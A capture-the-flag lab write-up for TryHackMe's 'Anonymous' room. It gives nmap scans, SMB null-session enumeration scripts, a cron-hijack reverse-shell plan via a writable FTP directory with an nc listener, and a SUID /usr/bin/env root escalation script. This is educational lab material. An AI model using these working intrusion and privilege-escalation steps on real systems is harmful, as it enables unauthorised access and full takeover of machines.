Anonymous
https://tryhackme.com/room/anonymous
Task 1: Pwn
Enumerate the machine. How many ports are open?
Let's perform a simple nmap scan of all TCP ports against the target machine. Note that -T5 is the most aggressive timing template; on a slow link it can miss ports, which is what the retransmission-cap warning below is about.
$ nmap -p- 10.10.94.176 -T5
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-02 20:19 IST
Warning: 10.10.94.176 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.94.176
Host is up (0.13s latency).
Not shown: 65503 closed tcp ports (conn-refused), 28 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 530.35 seconds
We can now perform an in-depth scan (-A: version detection, default NSE scripts, OS detection and traceroute) on only the open ports.
$ nmap -A -p 21,22,139,445 10.10.94.176
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-02 20:30 IST
Nmap scan report for 10.10.94.176
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.48.138
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-02-02T15:00:15
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2024-02-02T15:00:15+00:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds
There are four open ports:
21/tcp ftp (vsftpd, anonymous login allowed, writable scripts directory)
22/tcp ssh (OpenSSH 7.6p1)
139/tcp netbios-ssn (Samba smbd)
445/tcp netbios-ssn (Samba smbd 4.7.6-Ubuntu)
Answer: 4
What service is running on port 21?
Answer: ftp
What service is running on ports 139 and 445?
Answer: smb
There's a share on the user's computer. What's it called?
We can list out the SMB shares on the target using smbclient.
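The share listing the text refers to, as an added example that is not part of the original write-up. It runs smbclient over a null (anonymous) session, pulls the disk share names out of the listing, and lists the root of each share. Assumptions: smbclient is installed, the target IP is the lab address from the scan, and the sample listing (including the share name docs) is constructed so the parser can be exercised offline.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): enumerate SMB shares over a
# null session with smbclient and list the contents of each disk share.
set -u

# Extract share names from "smbclient -L" output. $2 is the share type column;
# the $-suffixed administrative shares (print$, IPC$) are dropped because they
# rarely hold user data.
parse_disk_shares() {
    awk '$2 == "Disk" { print $1 }' | grep -v '\$$' || true
}

# Shares visible to a null (anonymous, -N) session.
list_shares() {
    target="$1"
    smbclient -N -L "//${target}" 2>/dev/null | parse_disk_shares
}

# Connect to one share anonymously and run "ls" in its root.
list_share_contents() {
    target="$1"; share="$2"
    smbclient -N "//${target}/${share}" -c 'ls' 2>/dev/null
}

# Constructed sample of "smbclient -L" output (not real lab output) so the
# parser can be checked without network access.
SAMPLE_LISTING="$(printf '\tSharename       Type      Comment\n\t---------       ----      -------\n\tprint$          Disk      Printer Drivers\n\tdocs            Disk      Constructed example share\n\tIPC$            IPC       IPC Service (Samba, Ubuntu)\n')"

# Only touch the network when a target is given, e.g.
#   SMB_TARGET=10.10.94.176 bash smb_enum.sh
if [ -n "${SMB_TARGET:-}" ]; then
    for share in $(list_shares "$SMB_TARGET"); do
        echo "== //${SMB_TARGET}/${share} =="
        list_share_contents "$SMB_TARGET" "$share"
    done
fi
```

The nmap smb-security-mode output above already showed that a guest account was accepted, which is why the -N null session is worth trying before any credentials are in hand.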
Answer
user.txt
Looking back at our nmap scan, we can see that anonymous login is allowed on the FTP server.
Let's perform some enumeration on the server.
We can use the get command to download the files from the FTP server to our attacker machine.
Let's cat out the removed_files.log file.
Let's check the clean.sh script next.
It looks like this script is run by a cron job at a regular interval and appends its output to the removed_files.log file.
Since the scripts directory is world-writable (the nmap ftp-anon output flagged it as drwxrwxrwx and [NSE: writeable]), we can replace the contents of clean.sh with a reverse shell and wait for cron to execute it. A suitable one-liner can be taken from Pentest Monkey's reverse shell cheat sheet.
Once the clean.sh file has been modified, we can log back into the FTP server and upload the file using the put command.
Now all we have to do is set up an nc listener (nc -lvnp <port>) and wait for the next cron run.
Once the cron job executes the modified clean.sh, the reverse shell connects back to our listener and we have a shell on the target.
Let's get the user.txt flag.
Answer
root.txt
Let's search for files with the SUID bit set.
For this lab we will use the SUID-set /usr/bin/env binary to escalate privileges; the technique is listed on GTFOBins under env.
Let's use the exploit.
We can now read the root flag.
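The SUID hunt and the env escalation from the two steps above, as an added example that is not the write-up's own commands. It lists SUID binaries, filters out those expected on a stock Ubuntu host so the odd one out (here /usr/bin/env) stands out, and then applies the GTFOBins env technique. Assumptions: it is run on the target from the reverse shell; the baseline list is a short, hand-written approximation of default Ubuntu 18.04 SUID binaries rather than an authoritative one, and the sample find output is constructed.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): find SUID binaries, flag the ones that
# are not part of a stock Ubuntu install, and use the GTFOBins technique for a
# SUID /usr/bin/env to get a root shell.
set -u

# Approximate (constructed, not authoritative) list of binaries that carry the
# SUID bit on a default Ubuntu 18.04 host.
BASELINE_SUID='/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign'

# Every file with the setuid bit; errors from unreadable directories dropped.
find_suid() {
    find / -perm -4000 -type f 2>/dev/null
}

# Print the paths from stdin that are not in the baseline: these are the
# candidates worth checking against GTFOBins.
unusual_suid() {
    awk -v base="$BASELINE_SUID" '
        BEGIN { n = split(base, a, "\n"); for (i = 1; i <= n; i++) seen[a[i]] = 1 }
        !seen[$0]'
}

# GTFOBins (env, SUID): env execs a shell; -p stops sh from dropping the
# effective uid back to the real uid, so the shell keeps euid 0.
exploit_suid_env() {
    /usr/bin/env /bin/sh -p
}

# Constructed sample of find output (not real lab output).
SAMPLE_FIND='/bin/mount
/bin/ping
/bin/su
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/env'

# Only run the live checks when asked, e.g. RUN_ON_TARGET=1 bash suid.sh
if [ -n "${RUN_ON_TARGET:-}" ]; then
    echo "[*] SUID binaries outside the baseline:"
    find_suid | unusual_suid
    echo "[*] trying /usr/bin/env; verify with: id (expect euid=0(root))"
    exploit_suid_env
fi
```

After the escalation, confirm with id that the effective uid is 0 before reading /root/root.txt; without -p the shell would silently drop back to the calling user.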
Answer